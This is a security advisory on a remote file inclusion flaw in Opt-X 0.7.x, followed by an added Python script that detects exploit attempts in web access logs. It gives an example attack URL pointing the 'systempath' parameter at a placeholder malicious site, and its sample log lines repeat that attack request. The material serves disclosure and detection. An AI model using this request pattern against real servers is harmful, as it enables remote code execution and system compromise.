Opt-X Arbitrary File Inclusion Vulnerability
SECUNIA ADVISORY ID:
SA10967
VERIFY ADVISORY:
http://secunia.com/advisories/10967/
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
From remote
SOFTWARE:
Opt-X 0.7.x
DESCRIPTION:
G00db0y has reported a vulnerability in Opt-X, which can be exploited by malicious people to compromise a vulnerable system.
User input passed to the "systempath" parameter in "/includes/header.php" is not properly verified before being used to include files. This can be exploited to include scripts from external resources by passing a URL to a remote site.
Example including "menu.php" from a remote site: http://[victim]/includes/header.php?systempath=http://[malicious_site]/
Version 0.7.2 is reportedly affected.
SOLUTION:
Edit the source code to ensure that input passed to the "systempath" parameter is properly sanitised.
PROVIDED AND/OR DISCOVERED BY:
G00db0y, Zone-h Security Labs.
ORIGINAL ADVISORY:
http://www.zone-h.org/en/advisories/read/id=4036/
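A log check for the request pattern described above, as an added example that is not part of the Secunia or Zone-h advisory: it scans web server access log lines for requests to "includes/header.php" whose "systempath" query value decodes to a URL. The Apache-style log format, the sample lines, the client addresses and the host remote.example are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Mar/2004:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "-"
192.0.2.10 - - [01/Mar/2004:10:00:02 +0000] "GET /includes/header.php HTTP/1.1" 200 512 "-" "-"
198.51.100.7 - - [01/Mar/2004:10:02:13 +0000] "GET /includes/header.php?systempath=http://remote.example/ HTTP/1.0" 200 731 "-" "-"
198.51.100.7 - - [01/Mar/2004:10:02:20 +0000] "GET /optx/includes/header.php?systempath=hTTp%3A%2F%2Fremote.example%2F HTTP/1.0" 404 210 "-" "-"
192.0.2.23 - - [01/Mar/2004:10:05:00 +0000] "GET /includes/header.php?systempath=/var/www/optx/ HTTP/1.1" 200 512 "-" "-"
"""

# Client address, request target and status code of one log entry.
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+)[^"]*" (\d{3}) ')
# A URL scheme at the start of the decoded value (http://, ftp://, ...).
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.IGNORECASE)
TARGET_SUFFIX = "/includes/header.php"  # script named in the advisory
PARAM = "systempath"                    # parameter named in the advisory


def find_remote_includes(lines):
    """Return (client, status, decoded value) for every request that passes
    a URL in the systempath query parameter of includes/header.php."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        url = urlsplit(target)
        # Compare case-insensitively: some hosts serve paths that way.
        if not url.path.lower().endswith(TARGET_SUFFIX):
            continue
        # parse_qsl percent-decodes each value once, so encoded URLs match too.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == PARAM and SCHEME_RE.match(value):
                hits.append((client, status, value))
    return hits


if __name__ == "__main__":
    for client, status, value in find_remote_includes(SAMPLE_LOG.splitlines()):
        print(f"{client} status={status} systempath={value!r}")
```

Access logs normally record only the query string, so a value delivered in a POST body or cookie would not be seen by this check.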